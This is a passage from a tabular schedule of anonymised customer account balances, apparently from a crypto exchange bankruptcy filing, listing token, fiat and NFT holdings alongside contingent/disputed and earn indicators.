| 07435446 | | CUSDT[3], DOGE[943.91735122], TRX[2431.18352203], USD[0.00], USDT[0] | Yes | |
| 07435453 | | BF_POINT[200], ETHW[1.9692], TRX[.000001], USD[0.00], USDT[0] | | |
| 07435462 | | SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07435463 | Contingent, Disputed | SOL[.70497946], USD[0.00] | | |
| 07435465 | | AVAX[.00000001], BTC[0], ETH[0.00000001], SOL[0], USD[0.00], USDT[0] | | |
| 07435467 | | NFT (565711082641892722/FTX - Off The Grid Miami #1866)[1] | | |
| 07435470 | | NFT (536687724072274685/FTX - Off The Grid Miami #1778)[1] | | |
| 07435472 | | ETH[.008], ETHW[.008] | | |
| 07435474 | | BAT[1], BCH[3.00627298], BRZ[2], CUSDT[3], DOGE[18135.12693943], ETH[1.98884095], ETHW[1.98884095], GRT[761.42119997], SHIB[1], TRX[2910.00784134], USD[200.00] | | |
| 07435479 | | ETH[0] | | |
| 07435481 | | BAT[.00120165], BRZ[5.07952967], CUSDT[17], DOGE[3.000548], ETH[.93890822], ETHW[.938514], SHIB[1], USD[169.77] | Yes | |
| 07435485 | | BTC[0], USD[0.00] | | |
| 07435492 | | USD[11190.35] | | |
| 07435493 | | BTC[0.08720000], ETH[1.34839485], ETHW[1.34839485], USD[0.88] | | |
| 07435494 | | DOGE[1], SOL[15.59337614], USD[0.00] | | |
| 07435495 | | GRT[.488509], USD[0.00], USDT[0] | | |
| 07435502 | | BTC[0], ETH[0], ETHW[0], LTC[0], SOL[0], TRX[0], USD[0.27], USDT[0] | | |
| 07435503 | | BTC[.00005237], DOGE[112.74596853], ETH[.00323152], ETHW[.00323152], USD[25.00], YFI[.00000027] | | |
| 07435510 | | DOGE[13.22641759], USD[0.76] | Yes | |
| 07435513 | | ETH[0], USD[0.09], USDT[0] | | |
| 07435522 | | USD[0.02] | Yes | |
| 07435523 | | SHIB[1], USD[0.00] | | |
| 07435524 | | BTC[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00] | | |
| 07435525 | | USD[0.00] | | |
| 07435531 | | SOL[.066] | | |
| 07435532 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0], TRX[0] | | |
| 07435533 | | BRZ[3], CUSDT[2548.83886898], DOGE[1], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07435534 | | CUSDT[3], USD[0.00], USDT[0.00000011] | | |
| 07435535 | | BRZ[1], DOGE[667.35613183], LINK[37.73183189], SHIB[1], SOL[14.48688357], TRX[1], USD[0.00], USDT[0] | | |
| 07435537 | | CUSDT[1], DOGE[0], ETH[0], GRT[1], LINK[0], SOL[0], USD[0.00] | | |
| 07435538 | | DOGE[1827.34191385], USD[0.00] | | |
| 07435539 | | SHIB[99900], SOL[.004], TRX[.592], USD[5.73], USDT[.00012] | | |
| 07435543 | | BCH[0], BTC[0], CUSDT[1], DOGE[1], LINK[0], TRX[0], USD[0.00] | | |
| 07435550 | | BTC[0], DOGE[.905], SOL[.191255], USD[1.64] | | |
| 07435552 | | BRZ[1], CUSDT[5], DOGE[2.00005556], TRX[2.0000627], USD[0.01] | | |
| 07435553 | | CUSDT[4], DOGE[2.00076659], SHIB[1], TRX[1.00067538], USD[0.00], USDT[0] | | |
| 07435556 | | BF_POINT[300], BTC[0], DOGE[.00042344], ETH[0.00000064], LINK[0], LTC[.00002815], MATIC[.00222357], SHIB[7], SOL[.00002347], SUSHI[0], TRX[1.02827761], UNI[0], USD[0.00], USDT[0.00020548] | Yes | |
| 07435562 | | BRZ[2], BTC[.0110964], CUSDT[2], DOGE[4], ETH[.10470806], ETHW[.10470806], SOL[7.53818471], SUSHI[11.81013173], USD[50.00] | | |
| 07435564 | | TRX[65.62882123], USD[0.00] | | |
| 07435566 | | BTC[0], ETH[0], SOL[0.00000001], USD[0.00] | | |
| 07435570 | | BAT[1], BRZ[2], CUSDT[40], TRX[7], USD[0.00] | | |
| 07435573 | | SHIB[2], USD[0.00] | | |
| 07435580 | | SOL[0], USD[0.29] | | |
| 07435582 | | DOGE[1], USD[0.00], USDT[198.94111403] | | |
| 07435583 | | DOGE[1.163], ETH[.000462], ETHW[.000462], SOL[.00828], SUSHI[.3117], USD[2.89], USDT[0.00000001] | | |
| 07435584 | | BCH[0], BTC[0], CUSDT[1], SOL[0], USD[4.37] | | |
| 07435586 | | BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[93.13496849], ETH[0], GRT[0], KSHIB[0], LTC[0], SHIB[0], SOL[0], TRX[0.00085772], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07435589 | | ETH[.00009423], ETHW[0.00009423], USD[40.18] | | |
| 07435600 | | AVAX[0.11152669], CUSDT[0.27553455], DOGE[0.54244512], ETH[.0006], SOL[0], USD[3034.78], USDT[0] | | AVAX[.111106], DOGE[.529] |
| 07435602 | | BRZ[1], CUSDT[2], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07435606 | | SHIB[25898.07852965], SUSHI[.00569216], TRX[1], USD[0.02], USDT[0] | Yes | |
| 07435613 | | USD[0.00] | | |
| 07435619 | | USD[3.23] | | |
| 07435620 | | DOGE[342.276], SOL[.09], SUSHI[3.99], USD[3469.50] | | |
| 07435621 | | BAT[2565.75505], ETH[.0057737], ETHW[188.8444272], NEAR[599.43], SUSHI[.1143], USD[593.54], USDT[.0009525] | | |
| 07435622 | | BTC[0.14343003], ETH[1.14006795], ETHW[1.14006795], SOL[1.46938489], USD[0.18] | | |
| 07435625 | | USD[0.25] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07435626 | | BTC[.00448439], CUSDT[2], DOGE[2], SOL[3.23920326], USD[0.24] | | |
| 07435627 | | BCH[0], ETH[0.00000001], ETHW[0], SOL[0], USD[0.00], USDT[0] | | |
| 07435630 | | BTC[0.00000001], CUSDT[0], DOGE[0], ETH[0.00000029], GRT[0], LTC[0], SOL[0], USD[1.68], USDT[0] | Yes | |
| 07435632 | | ETH[.794442], ETHW[.794442], USD[0.00] | | |
| 07435633 | | SOL[0] | | |
| 07435635 | | CUSDT[1], TRX[3], USD[0.00] | Yes | |
| 07435639 | | BTC[.00007058], ETH[0], TRX[686.04158615], USD[7.26], USDT[0.00001598] | | |
| 07435646 | | ETH[.0042], ETHW[.0042], USD[23.61] | | |
| 07435654 | | ETHW[0], SOL[0], SUSHI[0], USD[0.97] | | |
| 07435655 | Contingent, Disputed | BTC[0], USD[2.93] | | |
| 07435657 | Contingent, Unliquidated | DOGE[2.54984677], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07435660 | | BRZ[1], USD[0.00] | Yes | |
| 07435664 | | BTC[.0000965], ETH[0.00000001], USD[99.83] | | |
| 07435667 | | CUSDT[1], USD[0.01] | | |
| 07435671 | | ETH[0], ETHW[0.04479816], NFT (34081560936884958/DRIP NFT)[1], SHIB[2], SOL[.822], USD[69.93] | Yes | |
| 07435673 | | BRZ[.00004232], CUSDT[7.1718674], USD[0.94] | | |
| 07435676 | | USD[0.00] | | |
| 07435677 | | BTC[.00356242], CUSDT[1], DOGE[392.11743283], USD[125.00] | | |
| 07435689 | | SOL[0], USD[1.24], USDT[7.16] | | |
| 07435690 | | DOGE[2], LTC[2.86768879], TRX[3], USD[3.64] | Yes | |
| 07435694 | | GRT[.866], USD[0.00] | | |
| 07435702 | | USD[22.64] | | |
| 07435709 | | BRZ[1], BTC[.00270953], CUSDT[4], DOGE[1], SHIB[812032.81088931], USD[0.00] | | |
| 07435716 | | BTC[.00895033] | | |
| 07435723 | | BCH[0], BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07435725 | | USD[0.00], USDT[1989.81894329] | | |
| 07435726 | | DOGE[0], ETH[0.00500000], ETHW[0.00500000], MATIC[0], SOL[0], USD[1.05] | | |
| 07435730 | | SOL[100], USD[12482.51] | | |
| 07435731 | | TRX[1], USD[0.00] | Yes | |
| 07435733 | | BCH[0.00000010], BRZ[1], BTC[0], CUSDT[6], DOGE[1.54532147], GRT[.00327698], SHIB[1020115.64352670], TRX[3], USD[5.40] | Yes | |
| 07435735 | | BTC[0.02887482], ETHW[1.7630715], SHIB[100000], USD[8.66] | | |
| 07435739 | | CUSDT[5], USD[0.00] | | |
| 07435740 | | USD[0.00], USDT[0.57639725] | | |
| 07435744 | | BTC[.99996089], SOL[.00328617], USD[0.00] | | |
| 07435745 | | CUSDT[2], SUSHI[.99629995], USD[0.01] | Yes | |
| 07435746 | | BTC[0.00003686], ETH[.000505], ETHW[.000505], SOL[.00292], USD[0.00], USDT[0] | | |
| 07435754 | | USD[0.39], USDT[0] | | |
| 07435755 | | ETH[0], LINK[0], LTC[0], SOL[0.00000626], USD[0.04] | | |
| 07435761 | | ETH[2.739258], ETHW[2.739258], USD[0.51] | | |
| 07435762 | | BTC[0], DAI[0], ETH[.00000001], ETHW[1.19678001], SOL[0], USD[0.02], USDT[0] | Yes | |
| 07435765 | | BF_POINT[200], SOL[0], USD[100.47] | | |
| 07435766 | | CUSDT[8], ETHW[.29985678], TRX[2], USD[645.19] | | |
| 07435772 | | BTC[0.00000001] | | |
| 07435773 | | DOGE[7526.291], USDT[1.246573] | | |
| 07435783 | | DOGE[1526.39817589], TRX[1], USD[0.00] | Yes | |
| 07435785 | | ETHW[.825684], USD[1.73] | | |
| 07435787 | | NFT (398849253404248474/SBF Hair & Signature #2 #149)[1], USD[0.01], USDT[0] | | |
| 07435789 | | CUSDT[5], DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07435794 | | TRX[0], USD[0.30] | | |
| 07435796 | | BCH[0], CUSDT[1], DOGE[638.47560531], TRX[2], USD[0.00], USDT[1] | | |
| 07435798 | | SOL[0] | | |
| 07435805 | | BAT[185.77348739], CUSDT[7], DOGE[1548.18921598], GRT[2.07791746], LINK[16.06728084], LTC[2.42829283], SUSHI[9.11084082], TRX[10019.79697057], UNI[7.89573861], USD[0.00], USDT[0] | Yes | |
| 07435808 | | BRZ[243.90210579], BTC[.00132027], CAD[33.48], CUSDT[1673.91297457], DOGE[488.93884405], EUR[70.15], LTC[.35928647], SHIB[396672.14039698], TRX[346.71637897], USD[0.00] | Yes | |
| 07435812 | | DOGE[0], ETH[.00000001], ETHW[0], USD[0.00] | | |
| 07435814 | | USD[0.00], USDT[12.8062809] | | |
| 07435829 | Contingent, Disputed | BTC[0.00000028], CUSDT[2], DOGE[0], PAXG[0], SGD[0.00], SOL[0], TRX[1], USD[0.01], USDT[0.00000001], YFI[0] | | |
| 07435844 | | DOGE[2], USD[0.00] | | |
| 07435846 | | DOGE[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07435847 | | ETH[0], NFT (377879303631573318/Entrance Voucher #83)[1], SOL[.004718], USD[0.61], USDT[0] | | |
| 07435849 | | AVAX[0.00000001], BTC[0.00000004], DOGE[.01], ETH[0.00100000], LINK[0.64323643], LTC[0.00006095], SOL[0.00090000], USD[0.81], USDT[0.00003464] | | |
| 07435855 | | BAT[736.98731292], BRZ[865.55326648], CUSDT[73.86041509], DOGE[17371.01592096], GRT[6103.94430737], KSHIB[4213.08787321], LINK[219.40412528], LTC[4.29854806], MATIC[545.38657473], NFT (304133994608966342/SOLYETIS #54)[1], NFT (306148436367661529/Portal To Another Dimension )[1], NFT (308614203917386229/Space Doge)[1], NFT (327671496371547657/CloudNFT Series 1 #35)[1], NFT (334918582063752115/1/1 Pieces 4.0)[1], NFT (342871020068550728/Solitude)[1], NFT (375562256599071348/Space Doge Boy #011)[1], NFT (395827926966794242/Can't Even Get Into My School Cafeteria)[1], NFT (404373861167859960/SOLYETIS #7754)[1], NFT (408447983544853962/SOLYETIS #7104)[1], NFT (408798885164765588/Illuminati Exhibit #1)[1], NFT (416100190786672976/Mesmerized )[1], NFT (427424132428300064/On Top Of The World)[1], NFT (435723471462480610/1/1 Pieces 2.0 )[1], NFT (437801622822796410/Scarface Collection #1)[1], NFT (477405648487778621/Illuminati Exhibit #3)[1], NFT (521579359545357886/1/1 Pieces 6.0)[1], NFT (564264855947563760/Doge Ross)[1], NFT (568263461990030711/Bevel Boy #025 - Day of the Dead)[1], SHIB[145991858.16659996], SOL[25.25212651], SUSHI[296.83213353], TRX[25801.92624342], UNI[9.96646563], USD[0.00], USDT[0] | Yes | |
| 07435859 | | DOGE[1], ETH[0], SHIB[1], SOL[0.00220935], UNI[0], USD[0.11], USDT[0] | Yes | |
| 07435860 | | USD[0.00], USDT[0] | | |
| 07435870 | | BTC[.0103029], CUSDT[2], DOGE[6], GRT[27.62520545], LINK[3.68387513], LTC[.50509898], SOL[7.57284459], TRX[1542.07521379], USD[0.00] | | |
| 07435871 | | BTC[0], SOL[.0138] | | |
| 07435872 | | DOGE[4], TRX[0.00006800], USD[0.00] | Yes | |
| 07435873 | | BTC[0.01273177], ETH[.084915], ETHW[.084915] | | |
| 07435877 | | CUSDT[1], USD[0.01] | Yes | |
| 07435880 | | USD[0.00] | | |
| 07435886 | | USD[100.00], USDT[0.00049520] | | |
| 07435888 | | BRZ[0], DOGE[4.34374379], USD[0.00], USDT[0] | | |
| 07435889 | | ETH[0], SOL[0], USD[1.01], USDT[0.00000002] | | |
| 07435890 | | CUSDT[1], USD[0.58] | | |
| 07435898 | | BAT[0], DOGE[3290.75836499], LINK[0], SOL[0], TRX[.000012], USD[0.66], USDT[0] | | |
| 07435899 | | DOGE[0], SOL[0], TRX[0], USDT[0] | | |
| 07435910 | | CUSDT[2], TRX[1], USD[2.93] | Yes | |
| 07435914 | | ETHW[2.89250698], USD[0.00] | | |
| 07435915 | | SOL[.00525622], USD[0.90] | | |
| 07435917 | | SOL[.996], USD[4.40] | | |
| 07435924 | | BTC[0.00000008], DAI[0.00013081], ETH[0.00308983], ETHW[0.00227001], GRT[0.00796198], LINK[0], NFT (296696231002204105/The 2974 Collection #1015)[1], NFT (353351244688545322/The 2974 Collection #1100)[1], NFT (412021570743731721/Birthday Cake #1015)[1], NFT (515869416417412022/Birthday Cake #1100)[1], NFT (541950508479118182/2974 Floyd Norman - OKC 5-0139)[1], NFT (548574641127811646/2974 Floyd Norman - CLE 6-0067)[1], SOL[13.51895439], SUSHI[0.84783301], TRX[.000006], UNI[0.00194332], USD[5.94], USDT[0.00306203] | | |
| 07435930 | | BTC[0], SOL[.064], TRX[.89], USD[4.39] | | |
| 07435933 | | NFT (442824518736731282/FTX - Off The Grid Miami #616)[1] | | |
| 07435936 | | USDT[8.88089] | | |
| 07435938 | | AAVE[.00580597], ETH[0], USD[1.00], USDT[0] | | |
| 07435942 | | ETH[0.01400693] | | |
| 07435946 | | USD[10.98] | Yes | |
| 07435959 | | BAT[1.0098011], CUSDT[3], DOGE[9286.55533615], SHIB[1], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07435967 | | USD[2.99] | | |
| 07435969 | | SOL[0] | | |
| 07435973 | | BF_POINT[300], BRZ[1], DOGE[.01654342], SHIB[1], TRX[1], USD[105.33] | Yes | |
| 07435979 | | DOGE[0], ETH[0], LTC[0], SOL[0], USDT[0.00000218] | | |
| 07435985 | | BTC[.00000001], CUSDT[1], EUR[89.73], USD[0.00] | Yes | |
| 07435990 | | SOL[0], TRX[1] | | |
| 07436001 | | NFT (405514411064056507/Microphone #1628)[1] | | |
| 07436004 | | SOL[7.65061397] | | |
| 07436011 | | BAT[1], BTC[.03100048], CUSDT[1], DOGE[2], ETH[.22470386], ETHW[.22470386], LINK[10.67142383], LTC[1.51696313], SOL[0.36154987], TRX[1], USD[0.00], USDT[1] | | |
| 07436015 | | USD[0.00] | | |
| 07436016 | | BAT[76.83414484], BCH[.09421013], BRZ[1], CUSDT[44], DOGE[1166.51993982], GRT[25.61288751], LINK[2.91703198], SOL[3.97662695], TRX[471.98262832], USD[1.14], USDT[49.13496234] | Yes | |
| 07436023 | | BTC[.00055859], CUSDT[2], ETH[0.00000076], ETHW[0.00000076], SHIB[2], USD[-0.57] | Yes | |
| 07436025 | | USD[11.20] | Yes | |
| 07436027 | | BTC[.01096445] | | |
| 07436033 | | USD[0.13] | | |
| 07436036 | | BRZ[1], BTC[0.01809077], DOGE[174.38905104], ETH[0.00000321], ETHW[0.00000321], PAXG[0.39664652], SHIB[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07436037 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07436038 | | USD[0.89] | | |
| 07436039 | | CUSDT[3], USD[0.00] | Yes | |
| 07436040 | | USD[0.57] | | |
| 07436050 | | BAT[1], ETH[1], ETHW[1], GRT[1], SOL[1.55258506], SUSHI[2], TRX[1], USD[0.00] | | |
| 07436055 | | BRZ[1], CUSDT[7], DOGE[6.00764956], NFT (570674802039440984/FTX - Off The Grid Miami #1909)[1], SHIB[4], TRX[0.00001200], USD[0.00], USDT[0.00009416] | Yes | |
| 07436056 | | SOL[.0681], TRX[857.2522575], USDT[2851.47323422] | | |
| 07436057 | | CUSDT[12], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07436060 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07436063 | | DOGE[1], USD[0.00] | | |
| 07436064 | | BTC[.00305273] | | |
| 07436068 | | BTC[.0001718], DOGE[2], ETH[.00279623], ETHW[.00279623], LINK[.53296739], SOL[1.06818939], USD[0.00] | | |
| 07436070 | | NFT (533635067306661573/Imola Ticket Stub #543)[1] | Yes | |
| 07436079 | | GRT[1], USD[1560.36] | | |
| 07436082 | | BTC[0], CUSDT[3], DOGE[1], TRX[1], USD[0.00], USDT[0.00037968] | Yes | |
| 07436084 | | SOL[0], USDT[10.16] | | |
| 07436091 | | BRZ[1], DOGE[28202.63234934], TRX[3], USD[0.00], USDT[1] | | |
| 07436094 | | BTC[0.00000154], ETH[0.00141862], ETHW[5.13141862], MATIC[3003.84138607], SOL[62.5], USD[20.11], USDT[0] | | |
| 07436095 | | DOGE[0], ETH[0], LTC[0], SHIB[13448033.29131915], SOL[21.11238802], TRX[0], USD[0.00], USDT[0.00000086] | | |
| 07436098 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07436099 | | BRZ[1], ETH[0.54024455], ETHW[0.54001777], GRT[1], KSHIB[0], LINK[0], MATIC[149.61685875], SHIB[1245158.04190795], TRX[1], USD[0.19] | Yes | |
| 07436102 | | NFT (560202011191573188/Miami Ticket Stub #575)[1], USD[0.43] | | |
| 07436104 | | BRZ[1], TRX[2], USD[0.00], USDT[2] | | |
| 07436105 | | BAT[115.87291889], DOGE[0.33587818], ETH[0.31080856], ETHW[0.31080856], NFT (548636544531290018/Romeo #382)[1], TRX[.000001], USD[0.00], USDT[585.00139901] | | |
| 07436106 | | CUSDT[.00521974], TRX[0.26095400], USD[0.01], USDT[0] | | |
| 07436108 | | CUSDT[9], DOGE[41.21313730], LINK[0], MATIC[0], SHIB[0], SOL[0], UNI[0] | Yes | |
| 07436112 | | BAT[1.63738811], BRZ[99.94218736], CUSDT[26.99998943], DOGE[1], GRT[2], SUSHI[.00001815], USD[0.00], USDT[0.00086154] | | |
| 07436116 | | DOGE[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07436120 | | CUSDT[2], USD[9.89] | | |
| 07436121 | | BTC[.00369796], CUSDT[1], TRX[1], USD[11.05] | Yes | |
| 07436128 | | BAT[3.13734512], BRZ[2], CUSDT[1], DOGE[2], ETH[0], GRT[2.02717829], SHIB[1], SOL[0], TRX[4], USD[806.29], USDT[1.00839855] | Yes | |
| 07436129 | | DOGE[1512.924], ETH[0.02497500], ETHW[0.02497500], USD[0.43] | | |
| 07436132 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07436136 | | ALGO[76.81000699], SHIB[2], USD[0.00] | Yes | |
| 07436137 | | BF_POINT[100] | Yes | |
| 07436140 | | DOGE[1], USD[0.01] | | |
| 07436153 | | BTC[1.34524386], USD[42276.35] | | |
| 07436155 | | SOL[8.48151000], USD[0.49] | | |
| 07436160 | | CUSDT[1.00006914], DOGE[3], GRT[15.17701432], SOL[2.99772578], TRX[1395.55343574], USD[52.08] | Yes | |
| 07436167 | | BTC[0], SOL[.25396], USD[1019.63], USDT[5.68887365] | | |
| 07436169 | | DOGE[8.991], USD[0.00], USDT[0.09735109] | | |
| 07436170 | | USD[0.76] | | |
| 07436175 | | CUSDT[2], USD[0.00] | | |
| 07436186 | | CUSDT[1], TRX[1], USD[1.50] | | |
| 07436198 | | BTC[0], DOGE[0], ETH[0], LTC[0.00420000], SOL[0], SUSHI[0], TRX[0.00000100], USD[0.02], USDT[0.83926140], YFI[0] | | |
| 07436201 | Contingent, Disputed | SOL[0] | | |
| 07436206 | | BTC[.000007] | | |
| 07436208 | | BCH[0], BTC[0], DOGE[0], ETH[0], TRX[1], USD[0.00], USDT[0] | | |
| 07436210 | | CUSDT[11], DOGE[1630.38132157], SOL[.45000549], TRX[4.00014899], USD[0.01] | Yes | |
| 07436212 | | BCH[0], BRZ[4], BTC[0], CUSDT[16], DOGE[1], ETH[0], TRX[6], USD[0.00], USDT[1.00001569], YFI[0] | | |
| 07436215 | | CUSDT[0], DOGE[0], USD[20.25] | | |
| 07436218 | | BAT[1.01170798], BRZ[2], CUSDT[5], ETH[.00000726], ETHW[.79478248], MATIC[161.31463813], TRX[1], USD[0.00], USDT[1.05886447] | Yes | |
| 07436220 | | BTC[.0000616], DOGE[.62], ETH[0.18594037], ETHW[0.18594037], USD[1.95], USDT[.004006] | | |
| 07436223 | | CUSDT[1], TRX[1], USD[102.03] | | |
| 07436224 | | USD[0.00], USDT[1.40254266] | | |
| 07436227 | | CUSDT[1], DOGE[3], GRT[1], USD[0.00], USDT[1] | | |
| 07436228 | | USD[4.10] | | |
| 07436230 | | CUSDT[2], TRX[.000001], USD[0.98], USDT[0] | | |
| 07436239 | | BCH[0], BTC[0], DOGE[0], LTC[0], SOL[0.09000000], SUSHI[0], TRX[0], UNI[0], USD[1.41], USDT[0.00926439] | | |
| 07436258 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07436259 | | BAT[.00866693], SOL[25.5331141], TRX[1], USD[10.75], USDT[0.00000913] | Yes | |
| 07436261 | | USD[391.20] | | |
| 07436264 | | BRZ[1], CUSDT[5], DOGE[1], SOL[.03586241], TRX[1], USD[0.49] | Yes | |
| 07436267 | | USD[0.01] | | |
| 07436269 | | NFT (459798931293331554/Entrance Voucher #3951)[1] | | |
| 07436272 | | BTC[.0000001], DOGE[2], ETH[.18163592], ETHW[.18139356], SHIB[1], TRX[1], USD[234.89] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07436281 | | CUSDT[1], SOL[.52431191], USD[0.00] | | |
| 07436282 | | USD[0.01] | | |
| 07436285 | | AAVE[.009], AVAX[0], BF_POINT[200], BTC[0], DOGE[6.00008365], ETH[0], GRT[3.00911244], LTC[0], MATIC[0], NFT (432446452971592384/FTX - Off The Grid Miami #23)[1], NFT (447470671639213809/Bahrain Ticket Stub #2043)[1], SHIB[1], SOL[0.00000001], TRX[8], USD[1.87], USDT[1.04595539] | Yes | |
| 07436292 | | ETH[.00000001], NFT (315500795871897975/Sigma Shark #2908)[1], NFT (350222105838686361/Sigma Shark #5927)[1], NFT (380764668462175191/Sigma Shark #5613)[1], NFT (407800986799564781/Sigma Shark #2914)[1], NFT (414007116076600072/Sigma Shark #2912)[1], NFT (444398342419675368/Sigma Shark #6274)[1], NFT (450547198221240372/Sigma Shark #5118)[1], NFT (466636871373713265/Sigma Shark #2913)[1], NFT (474306337985021944/Sigma Shark #2907)[1], NFT (562615676645331484/Sigma Shark #3426)[1], SOL[.00660355], USD[1.29] | | |
| 07436297 | | USD[150.00] | | |
| 07436308 | | USD[18.14] | | |
| 07436312 | | BRZ[4], CUSDT[8], DOGE[8.39335717], GRT[2.05921536], LTC[0], TRX[2], USD[0.50] | Yes | |
| 07436315 | | BTC[0], MATIC[0], SOL[0], USD[0.00] | | |
| 07436322 | | ETH[.0005725], ETHW[.0005725], USD[0.00] | | |
| 07436324 | | SOL[.004], USD[0.00], USDT[0] | | |
| 07436328 | | ETH[.00000001], NFT (564269585918563964/Basic Spider Bonetley)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07436329 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07436330 | | BTC[0], DOGE[0], ETH[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07436331 | | BRZ[1], ETH[.02717435], ETHW[.02717435], USD[0.00] | | |
| 07436334 | | BTC[0.00000029], USD[47.62], USDT[0] | | |
| 07436336 | | USD[30.00] | | |
| 07436337 | | DOGE[0] | | |
| 07436339 | | BTC[0], ETH[0], SOL[0], USD[0.14], USDT[.9388901] | | |
| 07436344 | | USD[24886.93], USDT[0] | | |
| 07436352 | | CUSDT[7], DOGE[1], ETH[.05370051], ETHW[.05303177], GRT[1.00498957], TRX[1320.7615159], USD[0.00], USDT[0], YFI[.00242819] | Yes | |
| 07436353 | | SOL[.39875619], USD[1.11], USDT[0.00904512] | Yes | |
| 07436354 | | DOGE[244.02], ETH[.067728], ETHW[.067728], TRX[1242.012], USD[0.70] | | |
| 07436362 | | SHIB[1], USD[40.44] | | |
| 07436370 | | SHIB[102941.44357692], USD[0.00] | Yes | |
| 07436372 | | BAT[.188], DOGE[.912], TRX[ 484], USD[0.28] | | |
| 07436375 | | BAT[1.01559041], BTC[.00000031], DOGE[1], ETH[.00000956], ETHW[.00000956], SUSHI[1.02957955], TRX[2], USD[0.01] | | |
| 07436384 | | CUSDT[8], TRX[1], USD[0.01] | | |
| 07436385 | | DOGE[1], USD[0.00] | | |
| 07436392 | | USD[518.23] | | |
| 07436395 | | TRX[.000001] | | |
| 07436396 | | CUSDT[1], ETH[.02175752], ETHW[.02175752], GRT[1], TRX[2], USD[0.01], USDT[0] | | |
| 07436397 | | BAT[3.21441025], BTC[.00096251], CUSDT[2], DOGE[.04447389], ETH[0.00220019], ETHW[0.00217283], GRT[1.00149878], TRX[42.34817047], USD[0.40], USDT[6.47485371] | Yes | |
| 07436399 | Contingent, Disputed | CUSDT[1], DOGE[3.000548], GRT[1.95562683], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07436400 | | DOGE[1], USD[0.00] | | |
| 07436401 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07436403 | | USD[0.00] | Yes | |
| 07436410 | | BTC[0.00000009], SUSHI[.455], USDT[0] | | |
| 07436411 | | BRZ[1], CUSDT[6], SHIB[2], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07436419 | | DOGE[1], TRX[4603.07952157], USD[700.00] | | |
| 07436428 | | USD[0.00] | | |
| 07436431 | | BAT[0], DOGE[6.78790308], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07436434 | | CUSDT[5], SHIB[2], USD[0.01] | Yes | |
| 07436440 | | NFT (307649755028513139/The Hill by FTX #4346)[1] | | |
| 07436441 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07436442 | | DOGE[.11340234], USD[0.00], USDT[0] | | |
| 07436445 | | BAT[44.82446773], BTC[.00202611], CUSDT[2], DOGE[181.03351442], USD[0.00] | Yes | |
| 07436447 | | BCH[0], DAI[0], DOGE[.216], SUSHI[0], TRX[0], USDT[0.83841561] | | |
| 07436450 | | BRZ[1], CUSDT[3], DOGE[6], GRT[1], TRX[3], USD[0.00] | | |
| 07436452 | | BTC[0], TRX[0] | | |
| 07436464 | | ETH[.000669], ETHW[.000669], LINK[34.965], TRX[465.849], USD[8.56] | | |
| 07436465 | | USD[2.42] | | |
| 07436466 | Contingent, Disputed | BTC[0], ETH[0.00], USDT[0.00020886] | | |
| 07436467 | | USD[5.42] | | |
| 07436469 | | CUSDT[5], SHIB[10.39082997], TRX[4], USD[0.04] | Yes | |
| 07436500 | | USD[1.30] | | |
| 07436504 | | ETH[0], LTC[0], SOL[0], USD[25000.00], USDT[0.00000001] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07436509 | | BAT[1], DOGE[1], ETH[0.00702914], ETHW[0.00700742], GRT[2], SOL[0], TRX[2], USD[0.99] | | |
| 07436512 | | BTC[0], DOGE[0], ETH[0], ETHW[0], MATIC[0], USD[0.00] | | |
| 07436514 | | SOL[1.20089119], USD[20.88] | | |
| 07436515 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], SHIB[0], TRX[0], USD[0.00] | Yes | |
| 07436516 | | USD[0.00] | | |
| 07436518 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0.00039953] | | |
| 07436520 | | BRZ[1], TRX[1], USD[0.01], USDT[0] | | |
| 07436525 | | USD[0.33], USDT[0.00000001] | | |
| 07436531 | | BTC[.00002205], DOGE[.234], ETH[.00000001], ETHW[0], SOL[.00540628], USD[0.23], USDT[0] | | |
| 07436534 | | SOL[.00045955], USDT[0] | Yes | |
| 07436540 | | BTC[0.00000001], LTC[0], MATIC[.1], USD[2.61] | | |
| 07436543 | | USD[0.04], USDT[0] | | |
